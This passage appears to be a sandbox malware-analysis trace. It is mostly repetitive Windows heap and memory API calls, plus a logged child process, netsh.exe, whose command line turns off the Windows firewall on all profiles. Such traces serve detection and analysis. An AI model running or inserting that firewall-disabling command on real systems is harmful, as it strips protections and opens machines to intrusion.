lpMem=0x2d1110 | out: hHeap=0x2b0000) returned 1 [0202.793] GetProcessHeap () returned 0x2b0000 [0202.793] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1130 | out: hHeap=0x2b0000) returned 1 [0202.793] GetProcessHeap () returned 0x2b0000 [0202.793] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1150 | out: hHeap=0x2b0000) returned 1 [0202.793] GetProcessHeap () returned 0x2b0000 [0202.793] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1170 | out: hHeap=0x2b0000) returned 1 [0202.793] GetProcessHeap () returned 0x2b0000 [0202.793] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1190 | out: hHeap=0x2b0000) returned 1 [0202.793] GetProcessHeap () returned 0x2b0000 [0202.793] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d11b0 | out: hHeap=0x2b0000) returned 1 [0202.793] GetProcessHeap () returned 0x2b0000 [0202.793] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d11d0 | out: hHeap=0x2b0000) returned 1 [0202.793] GetProcessHeap () returned 0x2b0000 [0202.793] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d11f0 | out: hHeap=0x2b0000) returned 1 [0202.793] GetProcessHeap () returned 0x2b0000 [0202.793] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1210 | out: hHeap=0x2b0000) returned 1 [0202.793] GetProcessHeap () returned 0x2b0000 [0202.793] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1230 | out: hHeap=0x2b0000) returned 1 [0202.793] GetProcessHeap () returned 0x2b0000 [0202.793] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1250 | out: hHeap=0x2b0000) returned 1 [0202.793] GetProcessHeap () returned 0x2b0000 [0202.793] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1270 | out: hHeap=0x2b0000) returned 1 [0202.793] GetProcessHeap () returned 0x2b0000 [0202.793] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1290 | out: hHeap=0x2b0000) returned 1 [0202.793] GetProcessHeap () returned 0x2b0000 [0202.793] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d12b0 | out: hHeap=0x2b0000) returned 1 [0202.793] GetProcessHeap () returned 0x2b0000 [0202.794] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d12d0 | out: hHeap=0x2b0000) returned 1 [0202.794] GetProcessHeap () returned 0x2b0000 [0202.794] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d12f0 | out: hHeap=0x2b0000) returned 1 [0202.794] GetProcessHeap () returned 0x2b0000 [0202.794] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1310 | out: hHeap=0x2b0000) returned 1 [0202.794] GetProcessHeap () returned 0x2b0000 [0202.794] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1330 | out: hHeap=0x2b0000) returned 1 [0202.794] GetProcessHeap () returned 0x2b0000 [0202.794] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1350 | out: hHeap=0x2b0000) returned 1 [0202.794] GetProcessHeap () returned 0x2b0000 [0202.794] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1370 | out: hHeap=0x2b0000) returned 1 [0202.794] GetProcessHeap () returned 0x2b0000 [0202.794] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1390 | out: hHeap=0x2b0000) returned 1 [0202.794] GetProcessHeap () returned 0x2b0000 [0202.794] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d13b0 | out: hHeap=0x2b0000) returned 1 [0202.794] GetProcessHeap () returned 0x2b0000 [0202.794] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d13d0 | out: hHeap=0x2b0000) returned 1 [0202.794] GetProcessHeap () returned 0x2b0000 [0202.794] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d13f0 | out: hHeap=0x2b0000) returned 1 [0202.794] GetProcessHeap () returned 0x2b0000 [0202.794] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1410 | out: hHeap=0x2b0000) returned 1 [0202.794] GetProcessHeap () returned 0x2b0000 [0202.794] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1430 | out: hHeap=0x2b0000) returned 1 [0202.794] GetProcessHeap () returned 0x2b0000 [0202.794] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1450 | out: hHeap=0x2b0000) returned 1 [0202.794] GetProcessHeap () returned 0x2b0000 [0202.794] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1470 | out: hHeap=0x2b0000) returned 1 [0202.794] GetProcessHeap () returned 0x2b0000 [0202.794] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1490 | out: hHeap=0x2b0000) returned 1 [0202.794] GetProcessHeap () returned 0x2b0000 [0202.794] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d14b0 | out: hHeap=0x2b0000) returned 1 [0202.794] GetProcessHeap () returned 0x2b0000 [0202.794] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d14d0 | out: hHeap=0x2b0000) returned 1 [0202.795] GetProcessHeap () returned 0x2b0000 [0202.795] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d14f0 | out: hHeap=0x2b0000) returned 1 [0202.795] GetProcessHeap () returned 0x2b0000 [0202.795] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1510 | out: hHeap=0x2b0000) returned 1 [0202.795] GetProcessHeap () returned 0x2b0000 [0202.795] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1530 | out: hHeap=0x2b0000) returned 1 [0202.795] GetProcessHeap () returned 0x2b0000 [0202.795] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1550 | out: hHeap=0x2b0000) returned 1 [0202.795] GetProcessHeap () returned 0x2b0000 [0202.795] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1570 | out: hHeap=0x2b0000) returned 1 [0202.795] GetProcessHeap () returned 0x2b0000 [0202.795] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1590 | out: hHeap=0x2b0000) returned 1 [0202.795] GetProcessHeap () returned 0x2b0000 [0202.795] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d15b0 | out: hHeap=0x2b0000) returned 1 [0202.795] GetProcessHeap () returned 0x2b0000 [0202.795] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d15d0 | out: hHeap=0x2b0000) returned 1 [0202.795] GetProcessHeap () returned 0x2b0000 [0202.795] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d15f0 | out: hHeap=0x2b0000) returned 1 [0202.795] GetProcessHeap () returned 0x2b0000 [0202.795] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1610 | out: hHeap=0x2b0000) returned 1 [0202.795] GetProcessHeap () returned 0x2b0000 [0202.795] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1630 | out: hHeap=0x2b0000) returned 1 [0202.795] GetProcessHeap () returned 0x2b0000 [0202.795] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1650 | out: hHeap=0x2b0000) returned 1 [0202.795] GetProcessHeap () returned 0x2b0000 [0202.795] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1670 | out: hHeap=0x2b0000) returned 1 [0202.795] GetProcessHeap () returned 0x2b0000 [0202.795] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1690 | out: hHeap=0x2b0000) returned 1 [0202.795] GetProcessHeap () returned 0x2b0000 [0202.795] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d16b0 | out: hHeap=0x2b0000) returned 1 [0202.795] GetProcessHeap () returned 0x2b0000 [0202.795] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d16d0 | out: hHeap=0x2b0000) returned 1 [0202.796] GetProcessHeap () returned 0x2b0000 [0202.796] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d16f0 | out: hHeap=0x2b0000) returned 1 [0202.796] GetProcessHeap () returned 0x2b0000 [0202.796] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1710 | out: hHeap=0x2b0000) returned 1 [0202.796] GetProcessHeap () returned 0x2b0000 [0202.796] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1730 | out: hHeap=0x2b0000) returned 1 [0202.796] GetProcessHeap () returned 0x2b0000 [0202.796] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1750 | out: hHeap=0x2b0000) returned 1 [0202.796] GetProcessHeap () returned 0x2b0000 [0202.796] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1770 | out: hHeap=0x2b0000) returned 1 [0202.796] GetProcessHeap () returned 0x2b0000 [0202.796] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1790 | out: hHeap=0x2b0000) returned 1 [0202.796] GetProcessHeap () returned 0x2b0000 [0202.796] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d17b0 | out: hHeap=0x2b0000) returned 1 [0202.796] GetProcessHeap () returned 0x2b0000 [0202.796] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d17d0 | out: hHeap=0x2b0000) returned 1 [0202.796] GetProcessHeap () returned 0x2b0000 [0202.796] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d17f0 | out: hHeap=0x2b0000) returned 1 [0202.796] GetProcessHeap () returned 0x2b0000 [0202.796] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1810 | out: hHeap=0x2b0000) returned 1 [0202.796] GetProcessHeap () returned 0x2b0000 [0202.796] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1830 | out: hHeap=0x2b0000) returned 1 [0202.796] GetProcessHeap () returned 0x2b0000 [0202.796] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1890 | out: hHeap=0x2b0000) returned 1 [0202.796] GetProcessHeap () returned 0x2b0000 [0202.796] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d18b0 | out: hHeap=0x2b0000) returned 1 [0202.796] GetProcessHeap () returned 0x2b0000 [0202.796] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d18d0 | out: hHeap=0x2b0000) returned 1 [0202.796] GetProcessHeap () returned 0x2b0000 [0202.796] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d18f0 | out: hHeap=0x2b0000) returned 1 [0202.796] GetProcessHeap () returned 0x2b0000 [0202.796] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1910 | out: hHeap=0x2b0000) returned 1 [0202.797] GetProcessHeap () returned 0x2b0000 [0202.797] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1930 | out: hHeap=0x2b0000) returned 1 [0202.797] GetProcessHeap () returned 0x2b0000 [0202.797] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1950 | out: hHeap=0x2b0000) returned 1 [0202.797] GetProcessHeap () returned 0x2b0000 [0202.797] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1970 | out: hHeap=0x2b0000) returned 1 [0202.797] GetProcessHeap () returned 0x2b0000 [0202.797] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1990 | out: hHeap=0x2b0000) returned 1 [0202.797] GetProcessHeap () returned 0x2b0000 [0202.797] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d19b0 | out: hHeap=0x2b0000) returned 1 [0202.797] GetProcessHeap () returned 0x2b0000 [0202.797] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d19d0 | out: hHeap=0x2b0000) returned 1 [0202.797] GetProcessHeap () returned 0x2b0000 [0202.797] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d19f0 | out: hHeap=0x2b0000) returned 1 [0202.797] GetProcessHeap () returned 0x2b0000 [0202.797] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1a10 | out: hHeap=0x2b0000) returned 1 [0202.797] GetProcessHeap () returned 0x2b0000 [0202.797] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1a30 | out: hHeap=0x2b0000) returned 1 [0202.797] GetProcessHeap () returned 0x2b0000 [0202.797] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1a50 | out: hHeap=0x2b0000) returned 1 [0202.797] GetProcessHeap () returned 0x2b0000 [0202.797] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1a70 | out: hHeap=0x2b0000) returned 1 [0202.797] GetProcessHeap () returned 0x2b0000 [0202.797] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1a90 | out: hHeap=0x2b0000) returned 1 [0202.797] GetProcessHeap () returned 0x2b0000 [0202.797] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ab0 | out: hHeap=0x2b0000) returned 1 [0202.797] GetProcessHeap () returned 0x2b0000 [0202.797] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ad0 | out: hHeap=0x2b0000) returned 1 [0202.797] GetProcessHeap () returned 0x2b0000 [0202.797] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1af0 | out: hHeap=0x2b0000) returned 1 [0202.797] GetProcessHeap () returned 0x2b0000 [0202.797] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1b10 | out: hHeap=0x2b0000) returned 1 [0202.798] GetProcessHeap () returned 0x2b0000 [0202.798] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x2b0000) returned 1 [0202.798] GetProcessHeap () returned 0x2b0000 [0202.798] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1b50 | out: hHeap=0x2b0000) returned 1 [0202.798] GetProcessHeap () returned 0x2b0000 [0202.798] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1b70 | out: hHeap=0x2b0000) returned 1 [0202.798] GetProcessHeap () returned 0x2b0000 [0202.798] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1b90 | out: hHeap=0x2b0000) returned 1 [0202.798] GetProcessHeap () returned 0x2b0000 [0202.798] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1bb0 | out: hHeap=0x2b0000) returned 1 [0202.798] GetProcessHeap () returned 0x2b0000 [0202.798] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1bd0 | out: hHeap=0x2b0000) returned 1 [0202.798] GetProcessHeap () returned 0x2b0000 [0202.798] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1bf0 | out: hHeap=0x2b0000) returned 1 [0202.798] GetProcessHeap () returned 0x2b0000 [0202.798] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1c10 | out: hHeap=0x2b0000) returned 1 [0202.798] GetProcessHeap () returned 0x2b0000 [0202.798] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1c30 | out: hHeap=0x2b0000) returned 1 [0202.798] GetProcessHeap () returned 0x2b0000 [0202.798] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1c50 | out: hHeap=0x2b0000) returned 1 [0202.798] GetProcessHeap () returned 0x2b0000 [0202.798] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1c70 | out: hHeap=0x2b0000) returned 1 [0202.798] GetProcessHeap () returned 0x2b0000 [0202.798] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1c90 | out: hHeap=0x2b0000) returned 1 [0202.798] GetProcessHeap () returned 0x2b0000 [0202.798] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1cb0 | out: hHeap=0x2b0000) returned 1 [0202.798] GetProcessHeap () returned 0x2b0000 [0202.798] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1cd0 | out: hHeap=0x2b0000) returned 1 [0202.798] GetProcessHeap () returned 0x2b0000 [0202.798] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1cf0 | out: hHeap=0x2b0000) returned 1 [0202.798] GetProcessHeap () returned 0x2b0000 [0202.798] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1d10 | out: hHeap=0x2b0000) returned 1 [0202.798] GetProcessHeap () returned 0x2b0000 [0202.798] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1d30 | out: hHeap=0x2b0000) returned 1 [0202.799] GetProcessHeap () returned 0x2b0000 [0202.799] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1d50 | out: hHeap=0x2b0000) returned 1 [0202.799] GetProcessHeap () returned 0x2b0000 [0202.799] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1d70 | out: hHeap=0x2b0000) returned 1 [0202.799] GetProcessHeap () returned 0x2b0000 [0202.799] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1d90 | out: hHeap=0x2b0000) returned 1 [0202.799] GetProcessHeap () returned 0x2b0000 [0202.799] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1db0 | out: hHeap=0x2b0000) returned 1 [0202.799] GetProcessHeap () returned 0x2b0000 [0202.799] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1dd0 | out: hHeap=0x2b0000) returned 1 [0202.799] GetProcessHeap () returned 0x2b0000 [0202.799] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1df0 | out: hHeap=0x2b0000) returned 1 [0202.799] GetProcessHeap () returned 0x2b0000 [0202.799] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1e10 | out: hHeap=0x2b0000) returned 1 [0202.799] GetProcessHeap () returned 0x2b0000 [0202.799] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1e30 | out: hHeap=0x2b0000) returned 1 [0202.799] GetProcessHeap () returned 0x2b0000 [0202.799] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1e50 | out: hHeap=0x2b0000) returned 1 [0202.799] GetProcessHeap () returned 0x2b0000 [0202.799] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1e70 | out: hHeap=0x2b0000) returned 1 [0202.799] GetProcessHeap () returned 0x2b0000 [0202.799] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1e90 | out: hHeap=0x2b0000) returned 1 [0202.799] GetProcessHeap () returned 0x2b0000 [0202.799] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1eb0 | out: hHeap=0x2b0000) returned 1 [0202.799] GetProcessHeap () returned 0x2b0000 [0202.799] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ed0 | out: hHeap=0x2b0000) returned 1 [0202.799] GetProcessHeap () returned 0x2b0000 [0202.799] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ef0 | out: hHeap=0x2b0000) returned 1 [0202.799] GetProcessHeap () returned 0x2b0000 [0202.799] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1f10 | out: hHeap=0x2b0000) returned 1 [0202.799] GetProcessHeap () returned 0x2b0000 [0202.799] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1f30 | out: hHeap=0x2b0000) returned 1 [0202.800] GetProcessHeap () returned 0x2b0000 [0202.800] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1f50 | out: hHeap=0x2b0000) returned 1 [0202.800] GetProcessHeap () returned 0x2b0000 [0202.800] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1f70 | out: hHeap=0x2b0000) returned 1 [0202.800] GetProcessHeap () returned 0x2b0000 [0202.800] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1f90 | out: hHeap=0x2b0000) returned 1 [0202.800] GetProcessHeap () returned 0x2b0000 [0202.800] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1fb0 | out: hHeap=0x2b0000) returned 1 [0202.800] GetProcessHeap () returned 0x2b0000 [0202.800] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1fd0 | out: hHeap=0x2b0000) returned 1 [0202.800] GetProcessHeap () returned 0x2b0000 [0202.800] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ff0 | out: hHeap=0x2b0000) returned 1 [0202.800] GetProcessHeap () returned 0x2b0000 [0202.800] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2010 | out: hHeap=0x2b0000) returned 1 [0202.800] GetProcessHeap () returned 0x2b0000 [0202.800] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2030 | out: hHeap=0x2b0000) returned 1 [0202.800] GetProcessHeap () returned 0x2b0000 [0202.800] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2090 | out: hHeap=0x2b0000) returned 1 [0202.800] GetProcessHeap () returned 0x2b0000 [0202.800] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d20b0 | out: hHeap=0x2b0000) returned 1 [0202.800] GetProcessHeap () returned 0x2b0000 [0202.800] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d20d0 | out: hHeap=0x2b0000) returned 1 [0202.800] GetProcessHeap () returned 0x2b0000 [0202.800] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d20f0 | out: hHeap=0x2b0000) returned 1 [0202.800] GetProcessHeap () returned 0x2b0000 [0202.800] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2110 | out: hHeap=0x2b0000) returned 1 [0202.800] GetProcessHeap () returned 0x2b0000 [0202.800] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2130 | out: hHeap=0x2b0000) returned 1 [0202.800] GetProcessHeap () returned 0x2b0000 [0202.800] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2150 | out: hHeap=0x2b0000) returned 1 [0202.800] GetProcessHeap () returned 0x2b0000 [0202.800] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2170 | out: hHeap=0x2b0000) returned 1 [0202.800] GetProcessHeap () returned 0x2b0000 [0202.800] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2190 | out: hHeap=0x2b0000) returned 1 [0202.801] GetProcessHeap () returned 0x2b0000 [0202.801] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d21b0 | out: hHeap=0x2b0000) returned 1 [0202.801] GetProcessHeap () returned 0x2b0000 [0202.801] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d21d0 | out: hHeap=0x2b0000) returned 1 [0202.801] GetProcessHeap () returned 0x2b0000 [0202.801] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d21f0 | out: hHeap=0x2b0000) returned 1 [0202.801] GetProcessHeap () returned 0x2b0000 [0202.801] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2210 | out: hHeap=0x2b0000) returned 1 [0202.801] GetProcessHeap () returned 0x2b0000 [0202.801] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2230 | out: hHeap=0x2b0000) returned 1 [0202.801] GetProcessHeap () returned 0x2b0000 [0202.801] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2250 | out: hHeap=0x2b0000) returned 1 [0202.801] GetProcessHeap () returned 0x2b0000 [0202.801] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2270 | out: hHeap=0x2b0000) returned 1 [0202.801] GetProcessHeap () returned 0x2b0000 [0202.801] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2290 | out: hHeap=0x2b0000) returned 1 [0202.801] GetProcessHeap () returned 0x2b0000 [0202.801] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d22b0 | out: hHeap=0x2b0000) returned 1 [0202.801] GetProcessHeap () returned 0x2b0000 [0202.801] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d22d0 | out: hHeap=0x2b0000) returned 1 [0202.801] exit (_Code=0) Thread: id = 153 os_tid = 0xb38 Thread: id = 176 os_tid = 0x9c4 Thread: id = 177 os_tid = 0x688 Thread: id = 178 os_tid = 0xb8c Thread: id = 183 os_tid = 0x6dc [0201.989] LocalAlloc (uFlags=0x40, uBytes=0x340) returned 0x325820 [0201.989] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x3377a0 [0201.989] LocalAlloc (uFlags=0x0, uBytes=0x18) returned 0x2ee4f0 [0201.989] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x33d660 [0201.989] LocalReAlloc (hMem=0x2ee4f0, uBytes=0x20, uFlags=0x2) returned 0x30f3e0 [0201.991] LocalFree (hMem=0x325820) returned 0x0 [0201.993] LocalFree (hMem=0x33d660) returned 0x0 [0201.994] LocalFree (hMem=0x30f3e0) returned 0x0 [0201.994] LocalFree (hMem=0x3377a0) returned 0x0 Process: id = "11" image_name = "netsh.exe" filename = "c:\\windows\\system32\\netsh.exe" page_root = "0x3f71d000" os_pid = "0xaa8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xbe0" cmd_line = "\"netsh.exe\" Advfirewall set allprofiles state off" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 109 os_tid = 0xbd0 [0126.886] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24fb50 | out: lpSystemTimeAsFileTime=0x24fb50*(dwLowDateTime=0xc4b2a40, dwHighDateTime=0x1d68bad)) [0126.886] GetCurrentProcessId () returned 0xaa8 [0126.886] GetCurrentThreadId () returned 0xbd0 [0126.886] GetTickCount () returned 0x11548b4 [0126.886] QueryPerformanceCounter (in: lpPerformanceCount=0x24fb58 | out: lpPerformanceCount=0x24fb58*=24716215116) returned 1 [0126.886] GetModuleHandleW (lpModuleName=0x0) returned 0x1350000 [0126.886] __set_app_type (_Type=0x1) [0126.887] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x135ad14) returned 0x0 [0126.887] __wgetmainargs (in: _Argc=0x13655c0, _Argv=0x13655d0, _Env=0x13655c8, _DoWildCard=0, _StartInfo=0x13655dc | out: _Argc=0x13655c0, _Argv=0x13655d0, _Env=0x13655c8) returned 0 [0126.887] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0126.887] GetModuleHandleW (lpModuleName=0x0) returned 0x1350000 [0126.888] _vsnwprintf (in: _Buffer=0x1367a40, _BufferCount=0x1fff, _Format="%s>", _ArgList=0x2476a8 | out: _Buffer="netsh>") returned 6 [0126.888] GetProcessHeap () returned 0x270000 [0126.888] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x2907a0 [0126.888] GetProcessHeap () returned 0x270000 [0126.888] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x2907c0 [0126.888] GetProcessHeap () returned 0x270000 [0126.888] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x2907e0 [0126.888] GetProcessHeap () returned 0x270000 [0126.888] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x290800 [0126.888] GetProcessHeap () returned 0x270000 [0126.888] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x290820 [0126.888] GetProcessHeap () returned 0x270000 [0126.888] 